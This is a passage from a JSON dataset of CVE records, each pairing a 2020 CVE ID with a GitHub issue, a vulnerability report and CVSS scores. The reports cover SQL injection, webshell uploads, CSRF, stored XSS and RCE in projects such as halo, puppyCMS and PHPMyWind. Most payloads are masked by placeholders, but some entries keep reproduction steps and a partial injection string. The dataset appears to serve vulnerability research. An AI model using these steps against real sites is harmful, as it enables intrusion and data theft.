  50279. "description": "float point exception in APITAG function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/fpe_poc Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG if (r.second NUMBERTAG return os << APITAG / r.second; (gdb) bt NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG b7c NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG d NUMBERTAG os=..., APITAG out>) at PATHTAG NUMBERTAG b7c NUMBERTAG in APITAG (this=<optimized out>, APITAG at PATHTAG NUMBERTAG ec in APITAG (this=<optimized out>, md=..., APITAG out>) at PATHTAG NUMBERTAG ff5c in APITAG (this=<optimized out>, image=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  50280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50281. "severity": "MEDIUM",
  50282. "baseScore": 6.5,
  50283. "impactScore": 3.6,
  50284. "exploitabilityScore": 2.8
  50285. },
  50286. {
  50287. "CVE_ID": "CVE-2020-18875",
  50288. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15882",
  50289. "Issue_Url_new": "https://github.com/dotcms/core/issues/15882",
  50290. "Repo_new": "dotcms/core",
  50291. "Issue_Created_At": "2019-01-24T13:46:13Z",
  50292. "description": "User Privileges in Velocity . Placeholder",
  50293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50294. "severity": "HIGH",
  50295. "baseScore": 8.8,
  50296. "impactScore": 5.9,
  50297. "exploitabilityScore": 2.8
  50298. },
  50299. {
  50300. "CVE_ID": "CVE-2020-18877",
  50301. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/175",
  50302. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/175",
  50303. "Repo_new": "wuzhicms/wuzhicms",
  50304. "Issue_Created_At": "2019-03-27T08:29:39Z",
  50305. "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. hi: I found a sql injection vulnerability in PATHTAG FILETAG the parameter 'flag' didn't filtering of harmful input,so I can injection sql. payload like this: URLTAG xxxx' or APITAG or ' Result: FILETAG FILETAG suggest: $flag = APITAG Release Info NUMBERTAG author by: xijun. EMAILTAG .cn",
  50306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  50307. "severity": "HIGH",
  50308. "baseScore": 7.5,
  50309. "impactScore": 3.6,
  50310. "exploitabilityScore": 3.9
  50311. },
  50312. {
  50313. "CVE_ID": "CVE-2020-18879",
  50314. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1011",
  50315. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1011",
  50316. "Repo_new": "bludit/bludit",
  50317. "Issue_Created_At": "2019-03-29T09:47:56Z",
  50318. "description": "a file upload vulnerability in PATHTAG Describe your problem a file upload vulnerability in PATHTAG can upload php file FILETAG Expected behavior Limit upload file type Actual behavior can upload php file Steps to reproduce the problem so I upload a php file FILETAG Visit FILETAG FILETAG Bludit version NUMBERTAG author by:xijun. EMAILTAG .cn",
  50319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50320. "severity": "CRITICAL",
  50321. "baseScore": 9.8,
  50322. "impactScore": 5.9,
  50323. "exploitabilityScore": 3.9
  50324. },
  50325. {
  50326. "CVE_ID": "CVE-2020-18885",
  50327. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/4",
  50328. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/4",
  50329. "Repo_new": "gaozhifeng/phpmywind",
  50330. "Issue_Created_At": "2019-04-02T11:11:46Z",
  50331. "description": "I found a php code execute in FILETAG at version NUMBERTAG hi: I found a php code execute in FILETAG at version NUMBERTAG open FILETAG NUMBERTAG at the setting watermark input the payload FILETAG Watermark text input xxx' Text color input APITAG FILETAG NUMBERTAG submit and visit watermark setting you can see the php code execute FILETAG because the payload was write in FILETAG FILETAG the FILETAG was inclue by require_once so php code execute FILETAG suggest: replace ' ,\\,;,(,) version NUMBERTAG author by xijun. EMAILTAG .cn I hope you can fix it",
  50332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50333. "severity": "HIGH",
  50334. "baseScore": 7.2,
  50335. "impactScore": 5.9,
  50336. "exploitabilityScore": 1.2
  50337. },
  50338. {
  50339. "CVE_ID": "CVE-2020-18886",
  50340. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/5",
  50341. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/5",
  50342. "Repo_new": "gaozhifeng/phpmywind",
  50343. "Issue_Created_At": "2019-04-02T11:57:38Z",
  50344. "description": "I found upload vulnerability FILETAG getshell at version NUMBERTAG login as admin NUMBERTAG isit website setting upload type add PHP (space) FILETAG because Windows will remove the space so by pass suffix check NUMBERTAG upload a php file like APITAG name FILETAG FILETAG filename add a space you can see upload success FILETAG NUMBERTAG isit the link you can see php code was execute FILETAG becaue at PATHTAG FILETAG you do not check the input filename so trim(filename) can help you author by xijun. EMAILTAG .cn version NUMBERTAG",
  50345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50346. "severity": "HIGH",
  50347. "baseScore": 7.2,
  50348. "impactScore": 5.9,
  50349. "exploitabilityScore": 1.2
  50350. },
  50351. {
  50352. "CVE_ID": "CVE-2020-18888",
  50353. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/15",
  50354. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/15",
  50355. "Repo_new": "choregus/puppycms",
  50356. "Issue_Created_At": "2019-03-27T15:55:43Z",
  50357. "description": "There is a Arbitrary File Deletion vulnerability that can remove everything without admin login.. The vuln file is PATHTAG No need to login to admin, open the following one page. APITAG delete file/folder ERRORTAG",
  50358. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  50359. "severity": "HIGH",
  50360. "baseScore": 7.5,
  50361. "impactScore": 3.6,
  50362. "exploitabilityScore": 3.9
  50363. },
  50364. {
  50365. "CVE_ID": "CVE-2020-18889",
  50366. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/13",
  50367. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/13",
  50368. "Repo_new": "choregus/puppycms",
  50369. "Issue_Created_At": "2019-03-27T15:44:47Z",
  50370. "description": "There is a CSRF vulnerability that can change the admin's password. The admin default password is puppycms. The vuln file is PATHTAG After the admin logged in, open the following one page. poc: APITAG change the admin's password ERRORTAG",
  50371. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  50372. "severity": "MEDIUM",
  50373. "baseScore": 6.5,
  50374. "impactScore": 3.6,
  50375. "exploitabilityScore": 2.8
  50376. },
  50377. {
  50378. "CVE_ID": "CVE-2020-18890",
  50379. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/14",
  50380. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/14",
  50381. "Repo_new": "choregus/puppycms",
  50382. "Issue_Created_At": "2019-03-27T15:50:21Z",
  50383. "description": "There is a RCE vulnerability that can upload a webshell without admin login.. The vuln file is PATHTAG No need to login to admin, open the following one page. APITAG getshell ERRORTAG",
  50384. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50385. "severity": "CRITICAL",
  50386. "baseScore": 9.8,
  50387. "impactScore": 5.9,
  50388. "exploitabilityScore": 3.9
  50389. },
  50390. {
  50391. "CVE_ID": "CVE-2020-18897",
  50392. "Issue_Url_old": "https://github.com/libyal/libpff/issues/62",
  50393. "Issue_Url_new": "https://github.com/libyal/libpff/issues/62",
  50394. "Repo_new": "libyal/libpff",
  50395. "Issue_Created_At": "2018-06-23T06:52:35Z",
  50396. "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
  50397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50398. "severity": "HIGH",
  50399. "baseScore": 7.8,
  50400. "impactScore": 5.9,
  50401. "exploitabilityScore": 1.8
  50402. },
  50403. {
  50404. "CVE_ID": "CVE-2020-18897",
  50405. "Issue_Url_old": "https://github.com/libyal/libpff/issues/61",
  50406. "Issue_Url_new": "https://github.com/libyal/libpff/issues/61",
  50407. "Repo_new": "libyal/libpff",
  50408. "Issue_Created_At": "2018-06-23T06:51:13Z",
  50409. "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
  50410. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50411. "severity": "HIGH",
  50412. "baseScore": 7.8,
  50413. "impactScore": 5.9,
  50414. "exploitabilityScore": 1.8
  50415. },
  50416. {
  50417. "CVE_ID": "CVE-2020-18898",
  50418. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/741",
  50419. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/741",
  50420. "Repo_new": "exiv2/exiv2",
  50421. "Issue_Created_At": "2019-03-13T08:57:11Z",
  50422. "description": "FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  50423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50424. "severity": "MEDIUM",
  50425. "baseScore": 6.5,
  50426. "impactScore": 3.6,
  50427. "exploitabilityScore": 2.8
  50428. },
  50429. {
  50430. "CVE_ID": "CVE-2020-18899",
  50431. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/742",
  50432. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/742",
  50433. "Repo_new": "exiv2/exiv2",
  50434. "Issue_Created_At": "2019-03-13T12:11:16Z",
  50435. "description": "Program crash due to uncontrolled memory allocation on function APITAG APITAG sizeof(box)). Hi there, An issue was discovered in APITAG APITAG sizeof(box)) function in APITAG as distributed in master and version NUMBERTAG There is an uncontrolled memory allocation problem, leading to a program crash. I have also confirmed this issue by using APITAG Here is the POC file. Please use the \u201c./exi NUMBERTAG pX $POC\u201d to reproduce the bug. FILETAG ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  50436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50437. "severity": "MEDIUM",
  50438. "baseScore": 6.5,
  50439. "impactScore": 3.6,
  50440. "exploitabilityScore": 2.8
  50441. },
  50442. {
  50443. "CVE_ID": "CVE-2020-18900",
  50444. "Issue_Url_old": "https://github.com/libyal/libexe/issues/1",
  50445. "Issue_Url_new": "https://github.com/libyal/libexe/issues/1",
  50446. "Repo_new": "libyal/libexe",
  50447. "Issue_Created_At": "2018-09-01T06:46:32Z",
  50448. "description": "Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c. Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c We found with our fuzzer multiple heap buffer overflow errors inside function APITAG The version we use is \"exeinfo NUMBERTAG These can be triggered when compiled with address sanitizer and run with exe file. Here is the POC files: FILETAG For example: ERRORTAG And ERRORTAG",
  50449. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  50450. "severity": "LOW",
  50451. "baseScore": 3.3,
  50452. "impactScore": 1.4,
  50453. "exploitabilityScore": 1.8
  50454. },
  50455. {
  50456. "CVE_ID": "CVE-2020-18964",
  50457. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/20",
  50458. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/20",
  50459. "Repo_new": "saysky/forestblog",
  50460. "Issue_Created_At": "2019-04-04T05:09:18Z",
  50461. "description": "There is csrf vulnerability . csrf vulnerability In this vulnerability, if the admin user click the Fishing links the hacker provided, the it can generate a new user that can login in the website management background. I review the code in the project, then I found that the code where the admin add other users, it has no protection for Cross site request forgery. FILETAG FILETAG so, I use burp to generate the CSRF Poc. FILETAG FILETAG then, if the admin click the button(some csrf link), it generates a new user admin2 in the websie. FILETAG admin2 can login in the website background. FILETAG for more test, this vulnerability can also use to delete some user in the website.",
  50462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50463. "severity": "HIGH",
  50464. "baseScore": 8.8,
  50465. "impactScore": 5.9,
  50466. "exploitabilityScore": 2.8
  50467. },
  50468. {
  50469. "CVE_ID": "CVE-2020-18976",
  50470. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/556",
  50471. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/556",
  50472. "Repo_new": "appneta/tcpreplay",
  50473. "Issue_Created_At": "2019-05-07T12:23:01Z",
  50474. "description": "Bug]. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug There is a buffer overflow write at APITAG , download at lastest commit APITAG Code near APITAG is showed below. The code didn't check whether the data is long enough comparing IP and TCP packet length. When running the poc, the data len is even less than IP header. So a buffer overflow write will reported when writing to TCP header. CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG download the code from commit APITAG (master head now NUMBERTAG download FILETAG NUMBERTAG Compile program with APITAG NUMBERTAG Execute APITAG Expected behavior A buffer overflow write will be reported by ASAN, which is showed at below screen shots part. Screenshots ERRORTAG System (please complete the following information): OS: ubuntu linux OS version NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Oct NUMBERTAG UTC NUMBERTAG APITAG Tcpreplay Version : master head at NUMBERTAG commit APITAG",
  50475. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50476. "severity": "MEDIUM",
  50477. "baseScore": 5.5,
  50478. "impactScore": 3.6,
  50479. "exploitabilityScore": 1.8
  50480. },
  50481. {
  50482. "CVE_ID": "CVE-2020-18979",
  50483. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/126",
  50484. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/126",
  50485. "Repo_new": "halo-dev/halo",
  50486. "Issue_Created_At": "2019-04-04T02:46:43Z",
  50487. "description": "These is A stored xss vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 In [issue NUMBERTAG URLTAG , someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point APITAG payload HTTP Requests ERRORTAG APITAG APITAG",
  50488. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50489. "severity": "MEDIUM",
  50490. "baseScore": 6.1,
  50491. "impactScore": 2.7,
  50492. "exploitabilityScore": 2.8
  50493. },
  50494. {
  50495. "CVE_ID": "CVE-2020-18980",
  50496. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/134",
  50497. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/134",
  50498. "Repo_new": "halo-dev/halo",
  50499. "Issue_Created_At": "2019-04-04T08:32:35Z",
  50500. "description": "Remote Code Execution in your system. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) [x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 Bug Report I read the code and find that function APITAG have a system call as ERRORTAG in ERRORTAG and you have do nothig with the APITAG and APITAG , so I can type in APITAG and APITAG is APITAG to RCE CODETAG",
  50501. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50502. "severity": "CRITICAL",
  50503. "baseScore": 9.8,
  50504. "impactScore": 5.9,
  50505. "exploitabilityScore": 3.9
  50506. },
  50507. {
  50508. "CVE_ID": "CVE-2020-18982",
  50509. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/127",
  50510. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/127",
  50511. "Repo_new": "halo-dev/halo",
  50512. "Issue_Created_At": "2019-04-04T03:19:25Z",
  50513. "description": "These is Another stored xss vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG but do nothing with APITAG FILETAG payload: ERRORTAG \\ APITAG ERRORTAG in uri APITAG APITAG",
  50514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50515. "severity": "MEDIUM",
  50516. "baseScore": 5.4,
  50517. "impactScore": 2.7,
  50518. "exploitabilityScore": 2.3
  50519. },
  50520. {
  50521. "CVE_ID": "CVE-2020-18984",
  50522. "Issue_Url_old": "https://github.com/buxu/bug/issues/2",
  50523. "Issue_Url_new": "https://github.com/buxu/bug/issues/2",
  50524. "Repo_new": "buxu/bug",
  50525. "Issue_Created_At": "2019-04-05T08:23:35Z",
  50526. "description": "Reflected XSS via Host header injection on Zimbra . Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: PATHTAG OS: Centos7 FILETAG",
  50527. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50528. "severity": "MEDIUM",
  50529. "baseScore": 6.1,
  50530. "impactScore": 2.7,
  50531. "exploitabilityScore": 2.8
  50532. },
  50533. {
  50534. "CVE_ID": "CVE-2020-18985",
  50535. "Issue_Url_old": "https://github.com/buxu/bug/issues/3",
  50536. "Issue_Url_new": "https://github.com/buxu/bug/issues/3",
  50537. "Repo_new": "buxu/bug",
  50538. "Issue_Created_At": "2019-04-05T08:45:33Z",
  50539. "description": "Open Redirect vulnerability on Zimbra. Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: URLTAG OS: Centos7 FILETAG",
  50540. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50541. "severity": "MEDIUM",
  50542. "baseScore": 6.1,
  50543. "impactScore": 2.7,
  50544. "exploitabilityScore": 2.8
  50545. },
  50546. {
  50547. "CVE_ID": "CVE-2020-18998",
  50548. "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/44",
  50549. "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/44",
  50550. "Repo_new": "xpleaf/blog_mini",
  50551. "Issue_Created_At": "2019-04-09T06:55:36Z",
  50552. "description": "Two Cross Site Scripting vulnerability in latest release NUMBERTAG A Cross site scripting on Add plugin Description Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross site scripting (XSS) vulnerability Steps To Reproduce: After the administrator logged in. Url : URLTAG Data APITAG APITAG FILETAG back to the homepage FILETAG FILETAG NUMBERTAG A Cross site scripting on Add Article Description Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} Use jinja2's safe tag to allow plugin content to be escaped and not filtered, resulting in Cross site scripting (XSS) vulnerability Steps To Reproduce: After the administrator logged in. URL URLTAG Data: APITAG APITAG &types NUMBERTAG summary=test FILETAG back to the homepage and Click on article ,this will trigger xss URLTAG FILETAG",
  50553. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50554. "severity": "MEDIUM",
  50555. "baseScore": 6.1,
  50556. "impactScore": 2.7,
  50557. "exploitabilityScore": 2.8
  50558. },
  50559. {
  50560. "CVE_ID": "CVE-2020-19000",
  50561. "Issue_Url_old": "https://github.com/tankywoo/simiki/issues/123",
  50562. "Issue_Url_new": "https://github.com/tankywoo/simiki/issues/123",
  50563. "Repo_new": "tankywoo/simiki",
  50564. "Issue_Created_At": "2019-04-15T12:27:24Z",
  50565. "description": "Smiik NUMBERTAG ss + rce. APITAG Examples: APITAG FILETAG The affected file appears to be FILETAG Line NUMBERTAG By default, jinja2 sets autoescape to False. Consider using APITAG or use the select_autoescape function to mitigate XSS vulnerabilities NUMBERTAG rce FILETAG line NUMBERTAG Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider APITAG This can lead to remote code execution. When simiki loads a malicious FILETAG file. Payload\uff1a APITAG When using smiik again, smi will load FILETAG and cause remote code execution FILETAG",
  50566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50567. "severity": "MEDIUM",
  50568. "baseScore": 6.1,
  50569. "impactScore": 2.7,
  50570. "exploitabilityScore": 2.8
  50571. },
  50572. {
  50573. "CVE_ID": "CVE-2020-19002",
  50574. "Issue_Url_old": "https://github.com/stephenmcd/mezzanine/issues/1921",
  50575. "Issue_Url_new": "https://github.com/stephenmcd/mezzanine/issues/1921",
  50576. "Repo_new": "stephenmcd/mezzanine",
  50577. "Issue_Created_At": "2019-04-23T10:01:01Z",
  50578. "description": "mezzanine xss. Version NUMBERTAG My English is not good, the report is translated by Google. Recurring vulnerabilities: Vulnerability url: APITAG When adding a blog, use Burpsuite to capture the package, modify the title to APITAG and the content as APITAG FILETAG Return APITAG to trigger the xss FILETAG The cause of the vulnerability is due to the description_from_content function of core/models.py, line NUMBERTAG where the value of title is called, resulting in xss FILETAG",
  50579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50580. "severity": "MEDIUM",
  50581. "baseScore": 6.1,
  50582. "impactScore": 2.7,
  50583. "exploitabilityScore": 2.8
  50584. },
  50585. {
  50586. "CVE_ID": "CVE-2020-19003",
  50587. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/728",
  50588. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/728",
  50589. "Repo_new": "liftoff/gateone",
  50590. "Issue_Created_At": "2019-04-09T07:10:01Z",
  50591. "description": "Gate One Whitelist Bypass. There is a configuration item \u201dorigins\u201d: FILETAG NUMBERTAG To make sure the attacker has tried to access the Gate One server, check the gateone log in the attacked host B, the result is as followed: FILETAG It proves that Gate One not recorded the real IP address of attack host APITAG instead of \u201clocalhost NUMBERTAG when the service verifies the APITAG NUMBERTAG Change http service port NUMBERTAG to NUMBERTAG on attack host A NUMBERTAG Access the page by URL APITAG in the attack host A, the response is as followed: FILETAG It means the attack host A has connect to the Gate One successfully NUMBERTAG Check logs of Gate One, the attack host A APITAG established a connection with the attacked host: FILETAG",
  50592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  50593. "severity": "MEDIUM",
  50594. "baseScore": 5.3,
  50595. "impactScore": 1.4,
  50596. "exploitabilityScore": 3.9
  50597. },
  50598. {
  50599. "CVE_ID": "CVE-2020-19005",
  50600. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/48",
  50601. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/48",
  50602. "Repo_new": "94fzb/zrlog",
  50603. "Issue_Created_At": "2019-04-07T11:14:36Z",
  50604. "description": "Unauthorized access to download database backup files NUMBERTAG No permission check due to export database backup file APITAG users can download the database backup file directly APITAG APITAG APITAG",
  50605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N",
  50606. "severity": "MEDIUM",
  50607. "baseScore": 5.7,
  50608. "impactScore": 3.6,
  50609. "exploitabilityScore": 2.1
  50610. },
  50611. {
  50612. "CVE_ID": "CVE-2020-19007",
  50613. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/547",
  50614. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/547",
  50615. "Repo_new": "halo-dev/halo",
  50616. "Issue_Created_At": "2020-02-08T08:43:59Z",
  50617. "description": "Stored xss on Halo blog. APITAG APITAG Environment Server Version NUMBERTAG Admin Version NUMBERTAG APITAG APITAG Vulnerability details APITAG Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered. step1: submit comment FILETAG The post packet is as follows\uff1a ERRORTAG step2: view the blog post After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser. FILETAG FILETAG code: PATHTAG FILETAG Suggestions for repair Proper encoding of untrusted request data Rich text filtering uses a common security API library for each programming language Escaping special characters using the developer's secure escape library APITAG",
  50618. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50619. "severity": "MEDIUM",
  50620. "baseScore": 5.4,
  50621. "impactScore": 2.7,
  50622. "exploitabilityScore": 2.3
  50623. },
  50624. {
  50625. "CVE_ID": "CVE-2020-19037",
  50626. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/135",
  50627. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/135",
  50628. "Repo_new": "halo-dev/halo",
  50629. "Issue_Created_At": "2019-04-04T15:13:08Z",
  50630. "description": "Bypass password access to encrypted articles. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
  50631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  50632. "severity": "MEDIUM",
  50633. "baseScore": 5.3,
  50634. "impactScore": 1.4,
  50635. "exploitabilityScore": 3.9
  50636. },
  50637. {
  50638. "CVE_ID": "CVE-2020-19038",
  50639. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/136",
  50640. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/136",
  50641. "Repo_new": "halo-dev/halo",
  50642. "Issue_Created_At": "2019-04-04T17:29:24Z",
  50643. "description": "Any file deletion in the background. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG",
  50644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  50645. "severity": "CRITICAL",
  50646. "baseScore": 9.1,
  50647. "impactScore": 5.2,
  50648. "exploitabilityScore": 3.9
  50649. },
  50650. {
  50651. "CVE_ID": "CVE-2020-19046",
  50652. "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/1",
  50653. "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/1",
  50654. "Repo_new": "pagli0cci/audit",
  50655. "Issue_Created_At": "2019-04-15T03:11:35Z",
  50656. "description": "s APITAG website system)reflect xss. Vulnerability directory: APITAG Vulnerability code FILETAG Construct payload FILETAG Use code URLTAG APITAG APITAG Got the website cookie FILETAG",
  50657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50658. "severity": "MEDIUM",
  50659. "baseScore": 5.4,
  50660. "impactScore": 2.7,
  50661. "exploitabilityScore": 2.3
  50662. },
  50663. {
  50664. "CVE_ID": "CVE-2020-19047",
  50665. "Issue_Url_old": "https://github.com/Aoyanm/audit/issues/2",
  50666. "Issue_Url_new": "https://github.com/pagli0cci/audit/issues/2",
  50667. "Repo_new": "pagli0cci/audit",
  50668. "Issue_Created_At": "2019-04-15T12:56:42Z",
  50669. "description": "Iwebshop NUMBERTAG csrf vulnerability. Vulnerability overview FILETAG Exploiting Vulnerability code text CODETAG FILETAG Exploit success picture FILETAG",
  50670. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50671. "severity": "HIGH",
  50672. "baseScore": 8.8,
  50673. "impactScore": 5.9,
  50674. "exploitabilityScore": 2.8
  50675. },
  50676. {
  50677. "CVE_ID": "CVE-2020-19048",
